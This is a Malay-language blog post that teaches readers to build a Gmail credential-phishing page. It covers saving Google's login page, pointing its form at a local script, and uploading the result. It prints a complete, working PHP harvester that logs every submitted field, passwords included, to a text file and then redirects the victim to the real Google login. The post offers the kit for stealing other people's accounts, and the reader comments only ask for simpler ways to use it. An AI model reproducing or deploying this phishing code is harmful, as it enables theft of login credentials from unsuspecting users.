Tutorial Hack Blog Menggunakan Phishing

Posted by SS  |  at  10:57:00 PTG 3 comments

Macam mana nak buat page phishing? Alaa download je la file phishing tu.. Apa jadah hacker main download code orang lain? Memalukan.. Meh sini aku ajo cara-cara nak buat phishing page korang sendiri.



1.Bukak laman www.blogger.com - right click - savepage as - save as "gmail" (tengok gamba kat atas tu)




2.Pergi ke file gmail yang korang dah save tadi - right click - open with notepad





gantikan


3.Lepastu dia keluar html code. Apa yang korang perlu buat ialah, gantikan "action="https://accounts.gogle.com/serviceloginauth" dengan "phish.php"




4.Akhir sekali kita buat file Phish.php. Code aku simple je sebab aku pakai tulang blakang dari html yang kita buat pada step-step di atas.

ni code dia:

<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



taip code dalam notepad dan save as "phish.php"





5.Pastikan semua file yang diperlukan telah siap sedia:
  • Gmail_files
  • Gmail.htm
  • Phish.php

6.Selesai sudah kita menyiapkan umpan kita. Jangan gembira dulu sebab umpan korang belum dicampak ke sungai. Klik sini untuk ke tutorial upload file phishing ke hosting.


Ok bye..


Tagged as:

About the Author

Seorang pelajar dan pekerja pada masa yang sama, belajar sekadar untuk bekalan hidup agar tak sesat, bekerja pula sekadar mencari harta dunia yg sementara.. sebarang pertanyaan emailkan ke: white_sheep@linuxmail.org

Get Updates

Subscribe to our e-mail newsletter to receive updates.

Share This Post

Related posts

3 ulasan:

  1. cop-cop..boleh terangkan tak apa itu pishing???..Lia tak pahe.

    BalasPadam
  2. phishing sama x dgn fishing


    heee

    BalasPadam
  3. copy and paste je tak boleh eh? leceh la nk upload2 nih =="

    BalasPadam

Cerita Lain

    Popular Posts

Copyright © 2013 Speaker Sekolah. Blogger SS converted by SpeakerSekolah
Amirul Fazil. Proudly Powered by Blogger.
back to top